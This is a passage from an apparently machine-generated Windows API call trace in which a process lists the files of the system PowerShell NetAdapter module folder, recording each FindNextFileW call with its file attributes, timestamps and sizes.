dwReserved1=0x0, cFileName="MSFT_NetAdapterVPort.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.260] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc82, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter.Format.Helper.psm1", cAlternateFileName="")) returned 1 [0177.260] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter.psd1", cAlternateFileName="")) returned 1 [0177.260] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb225, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter.Types.ps1xml", cAlternateFileName="")) returned 1 [0177.260] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0177.260] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0177.262] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.262] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter", lpFilePart=0x0) returned 0x3d [0177.262] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\", lpFilePart=0x0) returned 0x3e [0177.262] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0177.263] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.264] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2ffb, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.264] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x29ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapter.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.264] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3925, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterAdvancedProperty.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.264] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e57, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterAdvancedProperty.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.264] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x260e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterBinding.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.264] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterBinding.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.265] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2fb2, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterChecksumOffload.cdxml", cAlternateFileName="")) returned 1 [0177.265] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterChecksumOffload.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.265] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10cb565c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10cb565c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10cb565c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2418, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterEncapsulatedPacketTaskOffload.cdxml", cAlternateFileName="")) returned 1 [0177.265] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c29, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterEncapsulatedPacketTaskOffload.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.265] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterHardwareInfo.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.265] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10cb565c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1df8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterHardwareInfo.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.266] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x245a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterIPsecOffload.cdxml", cAlternateFileName="")) returned 1 [0177.266] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x15fb, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterIPsecOffload.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.266] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2432, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterLso.cdxml", cAlternateFileName="")) returned 1 [0177.266] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1748, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterLso.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.283] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e61, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterPacketDirect.cdxml", cAlternateFileName="")) returned 1 [0177.283] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c25, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterPacketDirect.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.284] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4100, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterPowerManagement.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.284] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcea, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterPowerManagement.Format.Helper.psm1", cAlternateFileName="")) returned 1 [0177.284] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e50, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterPowerManagement.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.284] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2005, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterQos.cdxml", cAlternateFileName="")) returned 1 [0177.284] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x148f, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterQos.Format.Helper.psm1", cAlternateFileName="")) returned 1 [0177.285] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a0b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterQos.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.285] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x20b5, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterRdma.cdxml", cAlternateFileName="")) returned 1 [0177.285] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2a18, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterRdma.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.285] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c691a7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c691a7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2a70, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterRsc.cdxml", cAlternateFileName="")) returned 1 [0177.286] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterRsc.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.286] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x27d1, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterRss.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.286] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1808, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterRss.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.287] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2701, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterSriov.cdxml", cAlternateFileName="")) returned 1 [0177.287] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe42, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterSriov.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.287] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterSriovVf.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.288] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10cb565c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10cb565c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10cb565c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb44, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterSriovVf.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.288] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterStatistics.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.288] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa3c, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterStatistics.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.288] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2319, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterVmq.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.289] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, 